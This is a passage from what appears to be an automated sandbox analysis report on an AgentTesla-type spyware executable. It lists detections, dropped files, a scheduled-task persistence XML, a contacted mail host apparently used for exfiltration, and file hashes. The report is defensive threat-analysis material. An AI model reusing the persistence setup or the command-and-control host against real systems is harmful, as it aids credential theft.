Tries to harvest and steal browser information (history, passwords, etc) 22->74 34 conhost.exe 24->34         started        76 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 26->76 36 conhost.exe 26->36         started        signatures9 process10

                      Screenshots

                      Thumbnails

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                      windows-stand

                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

                      SourceDetectionScannerLabelLink
                      DOCUMENTS.exe45%ReversingLabsWin32.Spyware.Negasteal
                      DOCUMENTS.exe36%VirustotalBrowse
                      DOCUMENTS.exe100%AviraHEUR/AGEN.1309705
                      DOCUMENTS.exe100%Joe Sandbox ML

                      Dropped Files

                      SourceDetectionScannerLabelLink
                      C:\Users\user\AppData\Roaming\bgURAojpNNIb.exe100%AviraHEUR/AGEN.1309705
                      C:\Users\user\AppData\Roaming\bgURAojpNNIb.exe100%Joe Sandbox ML
                      C:\Users\user\AppData\Roaming\bgURAojpNNIb.exe45%ReversingLabsWin32.Spyware.Negasteal
                      C:\Users\user\AppData\Roaming\bgURAojpNNIb.exe36%VirustotalBrowse

                      Unpacked PE Files

                      No Antivirus matches

                      Domains

                      SourceDetectionScannerLabelLink
                      mail.thelamalab.com0%VirustotalBrowse

                      URLs

                      SourceDetectionScannerLabelLink
                      http://mail.thelamalab.com0%VirustotalBrowse

                      Domains and IPs

                      Contacted Domains

                      NameIPActiveMaliciousAntivirus DetectionReputation
                      mail.thelamalab.com
                      		162.222.226.100
                      		truetrueunknown

                      URLs from Memory and Binaries

                      NameSourceMaliciousAntivirus DetectionReputation
                      http://mail.thelamalab.comRegSvcs.exe, 0000000D.00000002.1395584296.00000000030A8000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000012.00000002.2533846228.0000000002B26000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                      https://account.dyn.com/DOCUMENTS.exe, 00000001.00000002.1359470128.0000000004A7F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.1393894903.0000000000402000.00000040.00000400.00020000.00000000.sdmp, bgURAojpNNIb.exe, 0000000E.00000002.1418243148.0000000003B9B000.00000004.00000800.00020000.00000000.sdmpfalse
                        		high
                        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameDOCUMENTS.exe, 00000001.00000002.1357702369.0000000002FA1000.00000004.00000800.00020000.00000000.sdmp, bgURAojpNNIb.exe, 0000000E.00000002.1415939466.0000000002B78000.00000004.00000800.00020000.00000000.sdmpfalse
                          		high

                          World Map of Contacted IPs

                          • No. of IPs < 25%
                          • 25% < No. of IPs < 50%
                          • 50% < No. of IPs < 75%
                          • 75% < No. of IPs

                          Public IPs

                          IPDomainCountryFlagASNASN NameMalicious
                          162.222.226.100
                          		mail.thelamalab.comUnited States
                          		394695PUBLIC-DOMAIN-REGISTRYUStrue

                          General Information

                          Joe Sandbox version:40.0.0 Tourmaline
                          Analysis ID:1427366
                          Start date and time:2024-04-17 15:07:15 +02:00
                          Joe Sandbox product:CloudBasic
                          Overall analysis duration:0h 8m 34s
                          Hypervisor based Inspection enabled:false
                          Report type:full
                          Cookbook file name:default.jbs
                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                          Number of analysed new started processes analysed:23
                          Number of new started drivers analysed:0
                          Number of existing processes analysed:0
                          Number of existing drivers analysed:0
                          Number of injected processes analysed:0
                          Technologies:
                          • HCA enabled
                          • EGA enabled
                          • AMSI enabled
                          Analysis Mode:default
                          Analysis stop reason:Timeout
                          Sample name:DOCUMENTS.exe
                          Detection:MAL
                          Classification:mal100.troj.spyw.evad.winEXE@21/15@1/1
                          EGA Information:
                          • Successful, ratio: 100%
                          HCA Information:
                          • Successful, ratio: 99%
                          • Number of executed functions: 183
                          • Number of non-executed functions: 20
                          Cookbook Comments:
                          • Found application associated with file extension: .exe

                          Warnings

                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                          • Excluded domains from analysis (whitelisted): fs.microsoft.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                          • Not all processes where analyzed, report is missing behavior information
                          • Report size exceeded maximum capacity and may have missing behavior information.
                          • Report size getting too big, too many NtCreateKey calls found.
                          • Report size getting too big, too many NtOpenKeyEx calls found.
                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                          • Report size getting too big, too many NtQueryValueKey calls found.

                          Simulations

                          Behavior and APIs

                          TimeTypeDescription
                          15:08:12API Interceptor1x Sleep call for process: DOCUMENTS.exe modified
                          15:08:16API Interceptor34x Sleep call for process: powershell.exe modified
                          15:08:17Task SchedulerRun new task: bgURAojpNNIb path: C:\Users\user\AppData\Roaming\bgURAojpNNIb.exe
                          15:08:17API Interceptor37x Sleep call for process: RegSvcs.exe modified
                          15:08:19API Interceptor1x Sleep call for process: bgURAojpNNIb.exe modified

                          Joe Sandbox View / Context

                          IPs

                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                          162.222.226.100SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exeGet hashmaliciousAgentTeslaBrowse
                            SHIPPING ORDER.exeGet hashmaliciousAgentTeslaBrowse
                              receipt-73633T36X90N.exeGet hashmaliciousAgentTeslaBrowse
                                AQQ-T7630-CVE8.exeGet hashmaliciousAgentTeslaBrowse
                                  SecuriteInfo.com.Win32.CrypterX-gen.1573.32091.exeGet hashmaliciousAgentTeslaBrowse
                                    SCAN_INCORRECT_DETAILS.exeGet hashmaliciousAgentTeslaBrowse
                                      SecuriteInfo.com.Heur.26171.30744.exeGet hashmaliciousAgentTeslaBrowse
                                        INVOICE_FEB-888201-2024.exeGet hashmaliciousAgentTeslaBrowse
                                          INVOICE_FEB-888201-2024.exeGet hashmaliciousAgentTeslaBrowse
                                            PURCHASE ORDER.exeGet hashmaliciousAgentTeslaBrowse

                                              Domains

                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                              mail.thelamalab.comSecuriteInfo.com.Win32.PWSX-gen.28055.17747.exeGet hashmaliciousAgentTeslaBrowse
                                              • 162.222.226.100
                                              SHIPPING ORDER.exeGet hashmaliciousAgentTeslaBrowse
                                              • 162.222.226.100
                                              receipt-73633T36X90N.exeGet hashmaliciousAgentTeslaBrowse
                                              • 162.222.226.100
                                              AQQ-T7630-CVE8.exeGet hashmaliciousAgentTeslaBrowse
                                              • 162.222.226.100
                                              SecuriteInfo.com.Win32.CrypterX-gen.1573.32091.exeGet hashmaliciousAgentTeslaBrowse
                                              • 162.222.226.100
                                              SCAN_INCORRECT_DETAILS.exeGet hashmaliciousAgentTeslaBrowse
                                              • 162.222.226.100
                                              SecuriteInfo.com.Heur.26171.30744.exeGet hashmaliciousAgentTeslaBrowse
                                              • 162.222.226.100
                                              INVOICE_FEB-888201-2024.exeGet hashmaliciousAgentTeslaBrowse
                                              • 162.222.226.100
                                              INVOICE_FEB-888201-2024.exeGet hashmaliciousAgentTeslaBrowse
                                              • 162.222.226.100
                                              PURCHASE ORDER.exeGet hashmaliciousAgentTeslaBrowse
                                              • 162.222.226.100

                                              ASNs

                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                              PUBLIC-DOMAIN-REGISTRYUSCleared Payment.exeGet hashmaliciousAgentTeslaBrowse
                                              • 208.91.199.223
                                              Quote.exeGet hashmaliciousAgentTeslaBrowse
                                              • 208.91.199.225
                                              Quotation 0048484.exeGet hashmaliciousAgentTeslaBrowse
                                              • 208.91.199.225
                                              SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exeGet hashmaliciousAgentTeslaBrowse
                                              • 162.222.226.100
                                              Fsd5TmAZfy.exeGet hashmaliciousAgentTeslaBrowse
                                              • 208.91.198.143
                                              SHIPPING ORDER.exeGet hashmaliciousAgentTeslaBrowse
                                              • 162.222.226.100
                                              MV SUN OCEAN BUNKER INV.docGet hashmaliciousAgentTeslaBrowse
                                              • 208.91.199.224
                                              ReInquiry Lenght Error.exeGet hashmaliciousAgentTeslaBrowse
                                              • 208.91.199.223
                                              ES502900012.pdf.exeGet hashmaliciousAgentTeslaBrowse
                                              • 208.91.199.224
                                              April 2024 order Pdf.exeGet hashmaliciousAgentTeslaBrowse
                                              • 208.91.198.143

                                              JA3 Fingerprints

                                              No context

                                              Dropped Files

                                              No context

                                              Created / dropped Files

                                              C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\DOCUMENTS.exe.log

                                              Download File
                                              Process:C:\Users\user\Desktop\DOCUMENTS.exe
                                              File Type:ASCII text, with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):1216
                                              Entropy (8bit):5.34331486778365
                                              Encrypted:false
                                              SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                              MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                              SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                              SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                              SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                              Malicious:false
                                              Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

                                              C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\bgURAojpNNIb.exe.log

                                              Download File
                                              Process:C:\Users\user\AppData\Roaming\bgURAojpNNIb.exe
                                              File Type:ASCII text, with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):1216
                                              Entropy (8bit):5.34331486778365
                                              Encrypted:false
                                              SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                              MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                              SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                              SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                              SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                              Malicious:false
                                              Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

                                              C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                              Download File
                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):2232
                                              Entropy (8bit):5.379460230152629
                                              Encrypted:false
                                              SSDEEP:48:fWSU4y4RQmFoUeWmfgZ9tK8NPZHUm7u1iMugeC/ZPUyus:fLHyIFKL3IZ2KRH9Oug8s
                                              MD5:4DC84D28CF28EAE82806A5390E5721C8
                                              SHA1:66B6385EB104A782AD3737F2C302DEC0231ADEA2
                                              SHA-256:1B89BFB0F44C267035B5BC9B2A8692FF29440C0FEE71C636B377751DAF6911C0
                                              SHA-512:E8F45669D27975B41401419B8438E8F6219AF4D864C46B8E19DC5ECD50BD6CA589BDEEE600A73DDB27F8A8B4FF7318000641B6A59E0A5CDD7BE0C82D969A68DE
                                              Malicious:false
                                              Preview:@...e................................................@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.<...............i..VdqF...|...........System.ConfigurationH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0u1pmclm.esu.psm1

                                              Download File
                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:ASCII text, with no line terminators
                                              Category:dropped
                                              Size (bytes):60
                                              Entropy (8bit):4.038920595031593
                                              Encrypted:false
                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                              Malicious:false
                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2m234l3l.qw5.ps1

                                              Download File
                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:ASCII text, with no line terminators
                                              Category:dropped
                                              Size (bytes):60
                                              Entropy (8bit):4.038920595031593
                                              Encrypted:false
                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                              Malicious:false
                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_44e05z10.owa.ps1

                                              Download File
                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:ASCII text, with no line terminators
                                              Category:dropped
                                              Size (bytes):60
                                              Entropy (8bit):4.038920595031593
                                              Encrypted:false
                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                              Malicious:false
                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5xq0ehkr.t3b.ps1

                                              Download File
                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:ASCII text, with no line terminators
                                              Category:dropped
                                              Size (bytes):60
                                              Entropy (8bit):4.038920595031593
                                              Encrypted:false
                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                              Malicious:false
                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hkqeteoe.l1w.psm1

                                              Download File
                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:ASCII text, with no line terminators
                                              Category:dropped
                                              Size (bytes):60
                                              Entropy (8bit):4.038920595031593
                                              Encrypted:false
                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                              Malicious:false
                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_t30p3gth.ysj.ps1

                                              Download File
                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:ASCII text, with no line terminators
                                              Category:dropped
                                              Size (bytes):60
                                              Entropy (8bit):4.038920595031593
                                              Encrypted:false
                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                              Malicious:false
                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_x1llxcx4.004.psm1

                                              Download File
                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:ASCII text, with no line terminators
                                              Category:dropped
                                              Size (bytes):60
                                              Entropy (8bit):4.038920595031593
                                              Encrypted:false
                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                              Malicious:false
                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_x5okf0rq.djz.psm1

                                              Download File
                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:ASCII text, with no line terminators
                                              Category:dropped
                                              Size (bytes):60
                                              Entropy (8bit):4.038920595031593
                                              Encrypted:false
                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                              Malicious:false
                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                              C:\Users\user\AppData\Local\Temp\tmp1DED.tmp

                                              Download File
                                              Process:C:\Users\user\Desktop\DOCUMENTS.exe
                                              File Type:XML 1.0 document, ASCII text
                                              Category:dropped
                                              Size (bytes):1571
                                              Entropy (8bit):5.114289836870766
                                              Encrypted:false
                                              SSDEEP:48:cge7XQBBYrFdOFzOzN33ODOiDdKrsuTSv:He7XQBBYrFdOFzOz6dKrsuk
                                              MD5:D7836C3180BA5084ED5B66D06F809BD7
                                              SHA1:411AFEDF7A4D0FF932C29A5D1EB93336FA367FBC
                                              SHA-256:B0326B08B7C2C26C4F1A2803F9FE4EC6A1BEE592B9D0336C82332122BF59C282
                                              SHA-512:35E69C13F2C077FB2FD87B868DC7252AC031DF7E46E25C95DB7D3A91E69E6033933747892FB81C02E62AC96176FB492D003F6BF9289CDD9C3D819613C36F06B8
                                              Malicious:true
                                              Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAvailable>f

                                              C:\Users\user\AppData\Local\Temp\tmp35EA.tmp

                                              Download File
                                              Process:C:\Users\user\AppData\Roaming\bgURAojpNNIb.exe
                                              File Type:XML 1.0 document, ASCII text
                                              Category:dropped
                                              Size (bytes):1571
                                              Entropy (8bit):5.114289836870766
                                              Encrypted:false
                                              SSDEEP:48:cge7XQBBYrFdOFzOzN33ODOiDdKrsuTSv:He7XQBBYrFdOFzOz6dKrsuk
                                              MD5:D7836C3180BA5084ED5B66D06F809BD7
                                              SHA1:411AFEDF7A4D0FF932C29A5D1EB93336FA367FBC
                                              SHA-256:B0326B08B7C2C26C4F1A2803F9FE4EC6A1BEE592B9D0336C82332122BF59C282
                                              SHA-512:35E69C13F2C077FB2FD87B868DC7252AC031DF7E46E25C95DB7D3A91E69E6033933747892FB81C02E62AC96176FB492D003F6BF9289CDD9C3D819613C36F06B8
                                              Malicious:false
                                              Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAvailable>f

                                              C:\Users\user\AppData\Roaming\bgURAojpNNIb.exe

                                              Download File
                                              Process:C:\Users\user\Desktop\DOCUMENTS.exe
                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                              Category:dropped
                                              Size (bytes):740864
                                              Entropy (8bit):7.924525528723306
                                              Encrypted:false
                                              SSDEEP:12288:NGL21IL4BoL2cWjoIRWXcM6CtXx+KWjd1rYQILW4760PVQBmA8URQbXj3kZ3JPAN:sL21ILeoLrARfCJ3WJ1rYHW47ZVQ38XT
                                              MD5:E8CF42736F27344D295F0154E8F51097
                                              SHA1:162FC94FFF43FB35B2612CE4ECFDF1CC1C7A68A1
                                              SHA-256:2ECBED1E01A6404917129A03E0820FBAE016372FADDA8C057603A78A55FECD4C
                                              SHA-512:5EA81E66846390D05FA21DD45A533AC62388587B7315198DF67A7A98D1429E50753610654B0FEC5183AD680D8C08E3C0ECE35C45CE7CD43962065A262FC95E37
                                              Malicious:true
                                              Antivirus:
                                              • Antivirus: Avira, Detection: 100%
                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                              • Antivirus: ReversingLabs, Detection: 45%
                                              • Antivirus: Virustotal, Detection: 36%, Browse
                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....K.f..............0..2..........:Q... ...`....@.. ....................................@..................................P..O....`............................................................................... ............... ..H............text...X1... ...2.................. ..`.rsrc........`.......4..............@..@.reloc...............L..............@..B.................Q......H........o...j..........p...xv............................................{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..(....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..(....*..{....*"..}....*...0..)........{.........(....t......|......(...+...3.*....0..)........{.........(....t......|......(...+...3.*....0..)........{.........(....t......|......(...+...3.*....0..)........{.........(....t......|......(...+...3.

                                              C:\Users\user\AppData\Roaming\bgURAojpNNIb.exe:Zone.Identifier

                                              Download File
                                              Process:C:\Users\user\Desktop\DOCUMENTS.exe
                                              File Type:ASCII text, with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):26
                                              Entropy (8bit):3.95006375643621
                                              Encrypted:false
                                              SSDEEP:3:ggPYV:rPYV
                                              MD5:187F488E27DB4AF347237FE461A079AD
                                              SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                              SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                              SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                              Malicious:false
                                              Preview:[ZoneTransfer]....ZoneId=0

                                              Static File Info

                                              General

                                              File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                              Entropy (8bit):7.924525528723306
                                              TrID:
                                              • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                              • Win32 Executable (generic) a (10002005/4) 49.75%
                                              • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                              • Windows Screen Saver (13104/52) 0.07%
                                              • Generic Win/DOS Executable (2004/3) 0.01%
                                              File name:DOCUMENTS.exe
                                              File size:740'864 bytes
                                              MD5:e8cf42736f27344d295f0154e8f51097
                                              SHA1:162fc94fff43fb35b2612ce4ecfdf1cc1c7a68a1
                                              SHA256:2ecbed1e01a6404917129a03e0820fbae016372fadda8c057603a78a55fecd4c
                                              SHA512:5ea81e66846390d05fa21dd45a533ac62388587b7315198df67a7a98d1429e50753610654b0fec5183ad680d8c08e3c0ece35c45ce7cd43962065a262fc95e37
                                              SSDEEP:12288:NGL21IL4BoL2cWjoIRWXcM6CtXx+KWjd1rYQILW4760PVQBmA8URQbXj3kZ3JPAN:sL21ILeoLrARfCJ3WJ1rYHW47ZVQ38XT
                                              TLSH:D1F422497E18AA37CC79A5FA11A15E200277F1482A25EF8F7FD6F54A27E2F009582743
